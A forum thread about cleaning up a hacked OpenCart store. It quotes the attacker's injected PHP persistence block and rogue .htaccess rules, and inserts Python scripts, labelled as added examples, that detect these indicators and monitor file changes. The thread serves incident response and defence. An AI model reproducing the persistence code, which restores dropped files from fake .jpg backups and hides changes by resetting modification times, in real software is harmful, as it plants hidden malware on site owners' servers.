Post by iDragonFly^ » Sun Dec 26, 2021 6:54 pm

Hi everyone,
Whoever went through the same experience I had, please share it here: how to clean up the hacked files and how to prevent such an issue from happening!
I assume the website was hacked or injected with some code and loaded with files.

Under the main directory I saw new folders created; under these folders I found some weird files (remove them):
admin/error_logx.txt

admin/controller/extension/module

(1): accesson.php > this is a backdoor virus, I think.
(2): Return.php > also a virus, I think.
Other files:
4F49DF2A11.php
opheadar-lGVsyX.php
BAF77541E756.php
linksapis.php
lpinfo.php
readme_YKAVSBV.php
simple.php
statas.php
ulads.php
unlinks.php
error_log.txt
images > contains (banner_s.jpg, head_s.jpg, logo_s.jpg) but I don't think they are real jpg files.

security > contains (idlogs.txt, index.php, logs.txt, map.txt, moban.html). P.S.: the last name, "moban", means "theme" in Chinese. If you delete it, it keeps creating the same folder with (index.php, moban.html and logs.txt) again and again! You need to remove all the files I mentioned in this post.

websiteguide > contains several websiteamap.xml files

.htaccess file > contains:

<IfModule mod_rewrite.c>
Options +FollowSymLinks
RewriteEngine on
RewriteRule ^.*-(\d+)/$ security/index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^.*-r(\d+)/$ security/index\.php?cat=$1&%{QUERY_STRING} [L]
RewriteRule ^.*(website[a-z]+map\.xml)$  websiteguide/$1 [L]
RewriteBase /
</IfModule>
index.php > the following code was added to the top. By the way, the .htaccess file won't stay deleted unless you restore the original index.php contents or delete this code from the file header.

//ck1bg
// Paths used by the injected block: the dropped "security" directory, the site's
// .htaccess, and three files under images/ that carry .jpg names but actually hold
// backup copies of the malicious .htaccess, security/index.php and moban.html.
// Every call is prefixed with @ so the block never reports an error.
$nowFileDir =  'security';
$nowHtacFile =  './.htaccess';
$nmbf1 =  './security/moban.html';
$nowIndexFile =  './security/index.php';
$nowLogFile =  './security/logs.txt';
$bkLocalFileIndex1 =  './images/logo_s.jpg';
$bkLocalFileHtac1 =  './images/head_s.jpg';
$bkLocalFileMoban1 =  './images/banner_s.jpg';

// 1. If .htaccess is missing, or its size differs from the copy stored as
//    images/head_s.jpg, recreate security/ and overwrite .htaccess from that copy.
//    ($nowHtacFile is a non-empty string, so the first condition is always true.)
if($nowHtacFile && file_exists($bkLocalFileHtac1)){
	if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@chmod($nowHtacFile,0755);
		@file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));
		@chmod($nowHtacFile,0755);
	}
}


// 2. Same for security/index.php, restored from images/logo_s.jpg. The size check
//    is skipped once security/logs.txt exists, i.e. once the dropped script has run.
if(file_exists($bkLocalFileIndex1)){
	if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@chmod($nowIndexFile,0755);
		@file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1));
		@chmod($nowIndexFile,0755);
	}
}

// 3. Keep security/moban.html and images/banner_s.jpg in sync. If moban.html is
//    missing it is recreated from the backup. If the two differ in size and
//    moban.html contains the "#bbbtitsbbb#" placeholder but not the html5 marker,
//    the backup is refreshed from moban.html and its mtime is restored with touch()
//    so the change is not visible by modification date; otherwise moban.html is
//    rewritten from the backup.
if(file_exists($bkLocalFileMoban1)){
	
	if(!file_exists($nmbf1)){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));
		@chmod($nmbf1,0755);
	}else{
		if(filesize($nmbf1) != filesize($bkLocalFileMoban1)){
			$tpstrMb = file_get_contents($nmbf1);
			if(strstr($tpstrMb,"#bbbtitsbbb#") && !strstr($tpstrMb,"<!--ttt html5 tttt-->")){
				$fitime = filemtime($bkLocalFileMoban1);
				@chmod($bkLocalFileMoban1,0755);
				@file_put_contents($bkLocalFileMoban1,$tpstrMb);
				@touch($bkLocalFileMoban1, $fitime, $fitime);  
			}else{
				@chmod($bkLocalFileMoban1,0755);
				@file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));
				@chmod($bkLocalFileMoban1,0755);
			}
		}
	}
	
}
//ck1end
* I also did a scan of folders and files and found that this file under the home directory is a trojan:
404.shtml
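A triage script for the indicators listed in this post, added here as an example and not something the poster or OpenCart ships: it flags files that carry an image extension but no image header (the fake .jpg backups), .htaccess RewriteRules that route requests into security/ or websiteguide/, PHP files carrying the //ck1bg ... //ck1end block, and the two dropped directories at the webroot. The sample webroot it builds in a temp directory is constructed for the demo; the directory names and markers come from the post.

```python
"""Triage check for the infection pattern described in the post above.

Indicators: image-named files without an image header, RewriteRules into
security/ or websiteguide/, the //ck1bg ... //ck1end block in PHP files,
and the dropped top-level directories. Sample tree is constructed.
"""
import os
import re
import tempfile

# Magic numbers of image formats a legitimate OpenCart images/ folder would hold.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG", b"GIF8", b"RIFF", b"BM")
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp"}
# Rewrite targets from the posted .htaccess; a stock OpenCart .htaccess rewrites to index.php only.
INJECTED_REWRITE = re.compile(r"RewriteRule\s+\S+\s+(security/index\\?\.php|websiteguide/)", re.I)
# Marker comments bracketing the persistence block in the posted index.php.
INJECTED_MARKER = re.compile(r"//ck1bg.*?//ck1end", re.S)
DROPPED_DIRS = {"security", "websiteguide"}


def lacks_image_magic(head: bytes) -> bool:
    """True when the first bytes do not match any known image header."""
    return not head.startswith(IMAGE_MAGIC)


def has_injected_rewrite(htaccess: str) -> bool:
    return INJECTED_REWRITE.search(htaccess) is not None


def has_injected_marker(php_source: str) -> bool:
    return INJECTED_MARKER.search(php_source) is not None


def scan_webroot(root: str) -> dict:
    """Walk the webroot and return sorted lists of relative paths per indicator."""
    findings = {"masquerade": [], "rewrite": [], "marker": [], "dropped_dirs": []}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:
            findings["dropped_dirs"] = sorted(d for d in dirnames if d in DROPPED_DIRS)
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read()
            if ext in IMAGE_EXT and lacks_image_magic(data[:16]):
                findings["masquerade"].append(rel)
            elif name == ".htaccess" and has_injected_rewrite(data.decode("utf-8", "replace")):
                findings["rewrite"].append(rel)
            elif ext == ".php" and has_injected_marker(data.decode("utf-8", "replace")):
                findings["marker"].append(rel)
    for key in ("masquerade", "rewrite", "marker"):
        findings[key].sort()
    return findings


def build_demo_webroot() -> str:
    """Construct a sample webroot (not a real site) mirroring the post's layout."""
    root = tempfile.mkdtemp(prefix="oc_triage_")
    files = {
        "index.php": "<?php\n//ck1bg\n$nowFileDir =  'security';\n//ck1end\n"
                     "require_once('system/startup.php');\n",
        "catalog/controller/common/home.php": "<?php\nclass ControllerCommonHome {}\n",
        ".htaccess": "<IfModule mod_rewrite.c>\nRewriteEngine on\n"
                     "RewriteRule ^.*-(\\d+)/$ security/index\\.php?id=$1&%{QUERY_STRING} [L]\n"
                     "RewriteRule ^.*(website[a-z]+map\\.xml)$  websiteguide/$1 [L]\n</IfModule>\n",
        "security/index.php": "<?php\n// constructed stand-in for the dropped script\n",
        "websiteguide/websitesmap.xml": "<urlset/>\n",
    }
    for rel, text in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "logo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0\x00\x10JFIF")  # genuine JPEG header
    with open(os.path.join(root, "images", "banner_s.jpg"), "wb") as fh:
        fh.write(b"<html><!-- constructed: text stored under a .jpg name -->")
    return root


if __name__ == "__main__":
    for kind, paths in scan_webroot(build_demo_webroot()).items():
        print(f"{kind}: {paths}")
```

Run it against a copy of the site rather than the live webroot, and treat every hit as something to inspect: the header check will also flag the odd legitimately broken image, and the marker and rewrite checks only catch this specific variant, so they complement rather than replace a full comparison against a clean OpenCart release.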


Post by halfhope » Sun Dec 26, 2021 11:11 pm

Hi!
  • Download all site files and database to your computer.
  • Then check all these files, find shell/backdoor/etc. files and inserts of malicious code, and delete all unnecessary ones. Delete all executable files from the images folder. Clear cache/modifications/cache/logs/unused language files. To search, you can use virus scanners, incl. desktop antivirus (Bitdefender, avast, nod32, drweb, kaspersky) and ones specialized for the web (LMD, ai-bolit, revisium, etc., shell detector). You can also use GIT (compare your site with the original files; you can find malicious code in the modified files). In the case of applications with a single entry point (like OpenCart), you need to look for additional entry points into the application, namely passing of the parameters $_GET, $_POST, etc., as well as attempts to obfuscate them.
  • Change all store administrator passwords in the database. Rename the admin account. Check the oc_modification table for malicious code.
  • Change all possible passwords - to the database, to hosting, to your email, etc. Enable logging of server access requests, errors, etc.
  • Use maintenance mode .htaccess rules. Delete the site from the hosting, load a clean copy of the site instead, enter new data in the configs to connect to the database.
  • Protect your admin area from brute force with built-in HTTP authorization or Google reCAPTCHA.
  • Install a script to monitor the activity of the file system (shows new / changed / deleted files). If new malicious files are created, then you missed something, but now you can look at the logs and the file creation date to see who visited where, and track down the malicious code. Delete it and observe again.
A script for monitoring the file system can be downloaded from my secondary blog. Also, I have extension FSMonitor (en/de/ru).

Now botnets have become smart, if most of the malicious files have been deleted, they do not check all the rest and do not compromise the remaining files, but wait a couple of weeks and infect the site again.

If this is still relevant, I recommend not doing anything yourself, but contacting me. I will clean the site/server with a 1-year warranty, provided that the site does not use illegal paid add-ons. Upon completion of the work, you will receive a detailed report with safety recommendations. For some time after cleaning, the site will be monitored automatically to avoid re-infection (the site can be used). Term ~ 1 hour.
Last edited by halfhope on Mon Feb 28, 2022 4:45 pm, edited 2 times in total.

My FREE extensions in marketplace. [ security | flexibility | speedup ]
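An example of the file-system monitor halfhope describes (new / changed / deleted files), written for this thread and not halfhope's FSMonitor or OpenCart code: it takes a SHA-256 manifest of the webroot, stores it outside the site, and diffs a later manifest against it. It compares content hashes rather than mtimes because the injected block in the first post restores the backup file's mtime with touch() after rewriting it. The cache/log paths it skips are assumed OpenCart 3 locations, and the webroot and events in demo() are constructed for the example.

```python
"""Baseline-and-diff file system monitor for a webroot (constructed sample below).

Hashes content rather than trusting mtimes, because the persistence code posted
above restores mtimes with touch() after rewriting its backup file.
"""
import hashlib
import json
import os
import tempfile

# Directories whose churn would drown the report (assumed OpenCart 3 cache/log paths).
VOLATILE_DIRS = {"system/storage/cache", "system/storage/logs"}


def file_digest(path: str, chunk: int = 65536) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: str) -> dict:
    """Map each relative path under root to its sha256 and permission bits."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        prefix = "" if rel_dir == "." else rel_dir + "/"
        # Prune volatile directories in place so os.walk does not descend into them.
        dirnames[:] = [d for d in dirnames if prefix + d not in VOLATILE_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            manifest[prefix + name] = {
                "sha256": file_digest(path),
                "mode": oct(os.stat(path).st_mode & 0o777),
            }
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Report paths that appeared, changed (content or mode) or vanished."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
        "deleted": sorted(old - new),
    }


def save_manifest(manifest: dict, path: str) -> None:
    # Keep the baseline outside the document root so a web shell cannot rewrite it.
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path: str) -> dict:
    with open(path) as fh:
        return json.load(fh)


def _write(root: str, rel: str, text: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def demo() -> dict:
    """Constructed scenario: take a baseline, then simulate the changes from the post."""
    root = tempfile.mkdtemp(prefix="oc_fsmon_")
    _write(root, "index.php", "<?php\nrequire_once('system/startup.php');\n")
    _write(root, "admin/index.php", "<?php\n// admin entry point\n")
    _write(root, "install/index.php", "<?php\n// installer\n")
    _write(root, "system/storage/cache/cache.tmp", "old cache")
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="oc_baseline_"), "manifest.json")
    save_manifest(build_manifest(root), baseline_path)

    # Simulated events: a dropped file, a prepended persistence block,
    # a removed installer directory, and cache churn that must not be reported.
    _write(root, "security/index.php", "<?php\n// dropped file\n")
    _write(root, "index.php", "<?php\n//ck1bg\n$nowFileDir = 'security';\n//ck1end\n"
                              "require_once('system/startup.php');\n")
    os.remove(os.path.join(root, "install", "index.php"))
    _write(root, "system/storage/cache/cache.tmp", "new cache")

    return diff_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice, schedule build_manifest() from cron, keep the baseline and the script outside the document root, and re-baseline only after you have reviewed every reported path; a new file under images/ or a new top-level directory is exactly the pattern the first post describes.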



Post by josephdanial » Mon Feb 28, 2022 11:44 am

iDragonFly^ wrote:
Sun Dec 26, 2021 6:54 pm
[quotes the original post in full]
I also want to know this. Do you apply the solution provided in the comment?


Post by EvolveWebHosting » Tue Mar 01, 2022 10:39 am

How anyone has the patience to manually deal with attackers after they attack is mind boggling. It's always wiser to be proactive, not reactive. Attacks are fast and hard hitting. Typically, no two attacks are the same.

Opencart Hosting Plans, Domain Registration, Microsoft and Google Email and More
Visit our website for great deals and most importantly, fast and friendly support - www.evolvewebhosting.com



Post by johnp » Wed Mar 02, 2022 6:41 pm

EvolveWebHosting wrote:
Tue Mar 01, 2022 10:39 am
How anyone has the patience to manually deal with attackers after they attack is mind boggling. It's always wiser to be proactive, not reactive. Attacks are fast and hard hitting. Typically, no two attacks are the same.
I totally agree. I stick Ninja Firewall on and let it automatically take care of hacks and banning hackers automatically.

Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk



Post by mikeinterserv » Wed Mar 02, 2022 11:01 pm

johnp wrote:
Wed Mar 02, 2022 6:41 pm
EvolveWebHosting wrote:
Tue Mar 01, 2022 10:39 am
How anyone has the patience to manually deal with attackers after they attack is mind boggling. It's always wiser to be proactive, not reactive. Attacks are fast and hard hitting. Typically, no two attacks are the same.
I totally agree. I stick Ninja Firewall on and let it automatically take care of hacks and banning hackers automatically.
These techniques work for the amateur hacks and bots etc.
VERY unlikely a pro would be hacking little OC sites all over anyway.
If you have something worth hacking and you are hacked, it's very unlikely you will know about it until it's too late.
DB data can be taken without you knowing about it at all.
Everything depends on WHO is doing the hacking and what their intentions are.
99.9% of OC owners are dealing with amateurs and bots, as I said before; these might cause a bit of inconvenience here and there, but that's all.
